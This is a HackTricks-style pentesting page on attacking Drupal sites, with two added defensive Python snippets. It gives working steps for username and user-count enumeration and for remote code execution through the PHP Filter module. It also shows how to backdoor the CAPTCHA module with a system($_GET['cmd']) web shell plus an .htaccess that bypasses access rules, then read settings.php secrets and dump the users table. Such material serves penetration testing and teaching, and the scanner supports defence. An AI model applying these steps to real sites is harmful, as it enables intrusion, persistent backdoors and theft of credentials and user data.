# Drupal

<details>

<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Discovery

* Check **meta**

```bash
curl https://www.drupal.org/ | grep 'content="Drupal'
```

* **Node**: Drupal **indexes its content using nodes**. A node can **hold anything** such as a blog post, poll, article, etc. The page URIs are usually of the form `/node/<nodeid>`.

```bash
curl drupal-site.com/node/1
```

## Enumeration

Drupal supports **three types of users** by default:

1. **`Administrator`**: This user has complete control over the Drupal website.
2. **`Authenticated User`**: These users can log in to the website and perform operations such as adding and editing articles based on their permissions.
3. **`Anonymous`**: All website visitors are designated as anonymous. By default, these users are only allowed to read posts.

### Version

* Check `/CHANGELOG.txt`

```bash
curl -s http://drupal-site.local/CHANGELOG.txt | grep -m2 ""

Drupal 7.57, 2018-02-21
```

{% hint style="info" %}
Newer installs of Drupal by default block access to the `CHANGELOG.txt` and `README.txt` files.
{% endhint %}

### Username enumeration

#### Register

At */user/register*, try to create an account with a chosen username; if the name is already taken, the form tells you so:

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(254\).png)

#### Request new password

If you request a new password for an existing username:

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(255\).png)

If you request a new password for a non-existent username:

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(256\).png)

### Get number of users

Accessing */user/\<number>* reveals how many users exist: in this example there are 2, because */user/3* returns a not-found error:

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(257\).png)

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(227\)%20\(1\)%20\(1\).png)

### Hidden pages

**Fuzz `/node/$` where `$` is a number** (from 1 to 500 for example).\
You could find **hidden pages** (test, dev) which are not referenced by the search engines.

#### Installed modules info

```bash
#From https://twitter.com/intigriti/status/1439192489093644292/photo/1
#Get info on installed modules
curl https://example.com/config/sync/core.extension.yml
curl https://example.com/core/core.services.yml

# Download content from files exposed in the previous step
curl https://example.com/config/sync/swiftmailer.transport.yml
```
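
As an added example (not from the original page or from HackTricks), the following Python pulls out of saved responses exactly what the checks above look for: the version announced in the `Generator` meta tag, the exact version from the first line of `CHANGELOG.txt`, and the enabled-module list from an exposed `core.extension.yml` export, flagging the `php` module. The sample responses are constructed, and the `RISKY_MODULES` set is this example's own assumption.

```python
import re

# Constructed sample responses in the shapes the checks above look for;
# they are not captures from any real site.
SAMPLE_HTML = '<html><head><meta name="Generator" content="Drupal 7 (http://drupal.org)" /></head></html>'
SAMPLE_CHANGELOG = "Drupal 7.57, 2018-02-21\n-----------------------\n- Fixed security issues.\n"
SAMPLE_EXTENSION_YML = """_core:
  default_config_hash: placeholder-hash
module:
  captcha: 0
  node: 0
  php: 0
  system: -100
  user: 0
theme:
  bartik: 0
profile: standard
"""

def version_from_meta(html):
    """Return the Drupal version announced in the Generator meta tag, or None."""
    m = re.search(r'<meta\s+name="Generator"\s+content="Drupal ([^"(\s]+)', html, re.I)
    return m.group(1) if m else None

def version_from_changelog(text):
    """Return the exact version from the first line of CHANGELOG.txt, or None."""
    m = re.match(r"Drupal (\d+(?:\.\d+)*)", text)
    return m.group(1) if m else None

def enabled_modules(yml):
    """Parse the flat 'module: {name: weight}' mapping of core.extension.yml without PyYAML."""
    modules, in_module = {}, False
    for line in yml.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):          # top-level key: _core:, module:, theme:, profile:
            in_module = line.rstrip() == "module:"
        elif in_module:
            name, _, weight = line.strip().partition(":")
            modules[name] = int(weight)
    return modules

# Assumption of this example: 'php' evaluates editor-supplied PHP (the RCE path further down).
RISKY_MODULES = {"php"}

def risky_enabled(yml):
    """Return the enabled modules from RISKY_MODULES, sorted."""
    return sorted(RISKY_MODULES & set(enabled_modules(yml)))
```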

### Automatic

```bash
droopescan scan drupal -u http://drupal-site.local
```

## RCE

### With PHP Filter Module

{% hint style="warning" %}
In older versions of Drupal **(before version 8)**, it was possible to log in as an admin and **enable the `PHP filter` module**, which "Allows embedded PHP code/snippets to be evaluated."
{% endhint %}

The **php module must be installed** (check by requesting */modules/php*: a **403** means the module **exists**, a **404** means the **php module isn't installed**).

Go to *Modules* -> (**Check**) *PHP Filter* -> *Save configuration*

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(247\)%20\(1\).png)

Then click on *Add content* -> Select *Basic Page* or *Article* -> Write the *PHP shellcode in the body* -> Select *PHP code* in *Text format* -> Select *Preview*

![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(253\).png)

Finally just access the newly created node:

```bash
curl http://drupal-site.local/node/3
```

### Install PHP Filter Module

From version **8 onwards, the** [**PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **module is not installed by default**. To leverage this functionality, we would have to **install the module ourselves**.

1. Download the most recent version of the module from the Drupal website:
   * `wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz`
2. Once downloaded go to **`Administration`** > **`Reports`** > **`Available updates`**.
3. Click on **`Browse`**, select the file from the directory we downloaded it to, and then click **`Install`**.
4. Once the module is installed, we can click on **`Content`** and **create a new basic page**, similar to how we did in the Drupal 7 example. Again, be sure to **select `PHP code` from the `Text format` dropdown**.

### Backdoored Module

A backdoored module can be created by **adding a shell to an existing module**. Modules can be found on the drupal.org website. Let's pick a module such as [CAPTCHA](https://www.drupal.org/project/captcha). Scroll down and copy the link for the tar.gz [archive](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz).

* Download the archive and extract its contents.

```bash
wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
```

* Create a **PHP web shell** with the contents:

```php
<?php
system($_GET["cmd"]);
?>
```

* Next, we need to create a **`.htaccess`** file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the **`/modules`** folder.

```apache
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>
```

* A `RewriteEngine On` in a subdirectory starts a fresh per-directory rule set: mod_rewrite does not inherit the parent's rules unless `RewriteOptions Inherit` is set, so the rules in Drupal's root `.htaccess` that deny direct access under `/modules` no longer apply inside the captcha folder (which is also why `AllowOverride None` on module directories defeats this). Copy both files into the captcha folder and create an archive.

```bash
# Place the shell and the .htaccess inside the extracted module directory
mv shell.php .htaccess captcha
# Create a gzip-compressed archive (z), matching the .tar.gz name the installer expects
tar czvf captcha.tar.gz captcha/
```

* Assuming we have **administrative access** to the website, click on **`Manage`** and then **`Extend`** on the sidebar. Next, click on the **`+ Install new module`** button, and we will be taken to the install page, such as `http://drupal-site.local/admin/modules/install`. Browse to the backdoored Captcha archive and click **`Install`**.
* Once the installation succeeds, browse to **`/modules/captcha/shell.php`** to execute commands.
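
From the defender's side, the two files this walkthrough adds (a `.htaccess` inside a module directory and a PHP file that feeds request input to `system()`) are exactly what a pre-install review of a module archive should look for. The following Python is an added example, not part of the original page or of any Drupal tooling; the archive it inspects is constructed in memory, and the indicator patterns are this example's own assumptions.

```python
import io
import re
import tarfile

# Assumed indicators: modules never ship a .htaccess, and PHP that passes
# request input to a command-execution function has no place in a module.
EXEC_CALL = re.compile(rb"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(")
REQUEST_INPUT = re.compile(rb"\$_(GET|POST|REQUEST|COOKIE)\b")

def suspicious_members(tar_bytes):
    """Return a sorted list of (member name, reason) for a module archive."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for m in tar.getmembers():
            if not m.isfile():
                continue
            base = m.name.rsplit("/", 1)[-1]
            if base == ".htaccess":
                findings.append((m.name, "htaccess inside module directory"))
                continue
            if base.endswith((".php", ".inc", ".module")):
                data = tar.extractfile(m).read()
                if EXEC_CALL.search(data) and REQUEST_INPUT.search(data):
                    findings.append((m.name, "request input reaches command execution"))
    return sorted(findings)

def build_sample_archive(files):
    """Constructed in-memory tar.gz standing in for a downloaded module archive."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()

# Constructed sample: a harmless module file plus the two files the
# backdooring walkthrough above adds.
SAMPLE = build_sample_archive({
    "captcha/captcha.module": b"<?php\nfunction captcha_help() { return 'help'; }\n",
    "captcha/shell.php": b"<?php\nsystem($_GET[\"cmd\"]);\n",
    "captcha/.htaccess": b"<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteBase /\n</IfModule>\n",
})
```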

## Post Exploitation

### Read settings.php

```bash
find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null
```

### Dump users from DB

```bash
mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from users'
```



